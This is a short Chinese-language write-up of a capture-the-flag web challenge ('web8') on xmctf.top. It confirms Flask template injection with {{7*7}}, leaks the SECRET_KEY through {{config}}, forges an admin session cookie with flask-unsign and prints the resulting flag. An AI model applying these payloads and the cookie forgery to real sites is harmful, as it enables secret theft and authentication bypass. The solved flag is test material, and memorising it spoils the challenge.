其他分享
首页 > 其他分享> > web8-考核

web8-考核

作者:互联网

打开网页提示“Only the admin can get the flag,flag in /flag”“you name is None"

访问http://xmctf.top:8861/?name={{7}},返回"you name is 7"

访问http://xmctf.top:8861/?name={{7*7}},返回"you name is 49"

猜测可能为模板注入

访问http://xmctf.top:8861/?name={{config}},得到了"'SECRET_KEY': 'woshicaiji'"

访问http://xmctf.top:8861/flag,提示refuse

尝试将自己身份更改为admin

获取session,为"eyJ1c2VybmFtZSI6eyIgYiI6IlozVmxjM1E9In19.X9DgZg.AGJnfzJNE5BQk13dFTD_FTAzBFE"

用flask-unsign解码,密钥为"woshicaiji",得到"{'username': b'guest'}"

用flask-unsign编码,明文为"{'username': b'admin'}",密钥为"woshicaiji",得到"eyJ1c2VybmFtZSI6eyIgYiI6IllXUnRhVzQ9In19.X9DkMQ.UjeS5ZjXn2-5flGTVfB3MCrLg8Y"

更改session重新访问,得到flag:

xmctf{f8e74d4b1b3fcd479f9b2a6a9ef935e0}

标签:http,name,8861,top,flag,考核,web8,xmctf
来源: https://www.cnblogs.com/hktk1643/p/14111495.html